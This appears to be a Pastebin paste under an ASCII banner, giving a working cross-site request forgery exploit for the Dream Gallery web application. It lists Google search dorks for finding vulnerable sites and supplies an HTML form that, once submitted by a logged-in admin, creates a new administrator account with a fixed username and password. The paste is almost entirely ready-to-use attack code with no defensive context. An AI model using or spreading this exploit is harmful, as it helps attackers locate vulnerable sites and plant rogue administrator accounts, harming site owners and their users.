Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .__ __. _______ ______ __ ___ ______ ____ ____ _______
- | \ | | | ____| / __ \ | |/ / / __ \ \ \ / / | ____|
- | \| | | |__ | | | | | ' / | | | | \ \/ / | |__
- | . ` | | __| | | | | | < | | | | \_ _/ | __|
- | |\ | | |____ | `--' | | . \ | `--' | | | | |____
- |__| \__| |_______| \______/ |__|\__\ \______/ |__| |_______|
- # Exploit Title: Dream Gallery - CSRF Add Admin Exploit
- # Google Dork: 1: "Design by Rafael Clares"
- 2: ''inurl:dream/album.php''
- #Exploit:
- <html>
- <body>
- <form method="post" action="http://localhost.com/admin/usuario.php?action=incluir">
- <input type="hidden" name="user_login" value="NEO">
- <input type="hidden" name="user_password" type="hidden" value="112233" >
- <input type="hidden" name="user_email" value="">
- <input type="submit" value="create">
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment